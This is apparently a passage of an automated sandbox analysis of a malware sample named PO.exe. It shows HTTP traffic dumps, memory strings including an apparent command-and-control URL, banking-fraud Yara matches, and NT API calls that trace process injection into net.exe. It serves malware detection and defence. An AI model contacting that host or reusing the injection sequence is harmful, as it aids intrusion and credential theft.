3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 77 65 62 73 69 74 65 20 68 61 73 20 62 65 65 6e 20 73 75 73 70 65 6e 64 65 64 2e 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 
6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 31 35 70 78 20 30 20 32 35 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:53:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:53:31 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:53:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:53:36 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3003263592.0000000000D37000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.adjokctp.icu
                Source: vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3003263592.0000000000D37000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.adjokctp.icu/wurw/
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
                Source: PO.exe, 00000000.00000002.1792334257.0000000005964000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com(6
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
                Source: PO.exe, 00000000.00000002.1792769755.0000000007092000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: net.exe, 00000007.00000002.3002318934.0000000000621000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: net.exe, 00000007.00000002.3002318934.0000000000621000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: net.exe, 00000007.00000002.3002318934.0000000000621000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: net.exe, 00000007.00000002.3002318934.0000000000621000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033T
                Source: net.exe, 00000007.00000002.3002318934.0000000000621000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: net.exe, 00000007.00000002.3002318934.0000000000621000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: net.exe, 00000007.00000003.2470010190.0000000007813000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: net.exe, 00000007.00000003.2482762594.0000000007828000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                Source: Yara match | File source: 2.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.3001987219.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3003697143.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2274480081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3003263592.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2275144613.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3003792289.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3003894654.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2276815153.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_0042C713 NtClose
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732B60 NtClose,LdrInitializeThunk
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017335C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01734340 NtSetContextThread
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01734650 NtSuspendThread
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732BF0 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732BE0 NtQueryValueKey
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732BA0 NtEnumerateValueKey
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732B80 NtQueryInformationFile
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732AF0 NtWriteFile
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732AD0 NtReadFile
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732AB0 NtWaitForSingleObject
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732D30 NtUnmapViewOfSection
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732D10 NtMapViewOfSection
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732D00 NtSetInformationFile
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732DD0 NtDelayExecution
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732DB0 NtEnumerateKey
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732C60 NtCreateKey
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732C00 NtQueryInformationProcess
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732CF0 NtOpenProcess
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732CC0 NtQueryVirtualMemory
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732CA0 NtQueryInformationToken
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732F60 NtCreateProcessEx
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732F30 NtCreateSection
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732FE0 NtCreateFile
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732FB0 NtResumeThread
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732FA0 NtQuerySection
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732F90 NtProtectVirtualMemory
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732E30 NtWriteVirtualMemory
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732EE0 NtQueueApcThread
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732EA0 NtAdjustPrivilegesToken
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01732E80 NtReadVirtualMemory
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01733010 NtOpenDirectoryObject
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01733090 NtSetValueKey
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017339B0 NtGetContextThread
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01733D70 NtOpenThread
                Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01733D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E94340 NtSetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E94650 NtSuspendThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92AF0 NtWriteFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92AD0 NtReadFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92BE0 NtQueryValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92BF0 NtAllocateVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92BA0 NtEnumerateValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92EE0 NtQueueApcThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92E80 NtReadVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92FE0 NtCreateFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92FB0 NtResumeThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92F30 NtCreateSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92CA0 NtQueryInformationToken,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92C60 NtCreateKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92DD0 NtDelayExecution,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92D30 NtUnmapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92D10 NtMapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E935C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E939B0 NtGetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E92D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E93090 NtSetValueKey
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E93010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E93D70 NtOpenThread
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E93D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_00449270 NtCreateFile
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_004493D0 NtReadFile
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_004494C0 NtDeleteFile
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_00449560 NtClose
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_004496D0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_00ACF7E7 NtMapViewOfSection
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_00ACF9EE NtSetContextThread
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0141DFC40_2_0141DFC4
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759BF780_2_0759BF78
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759A6580_2_0759A658
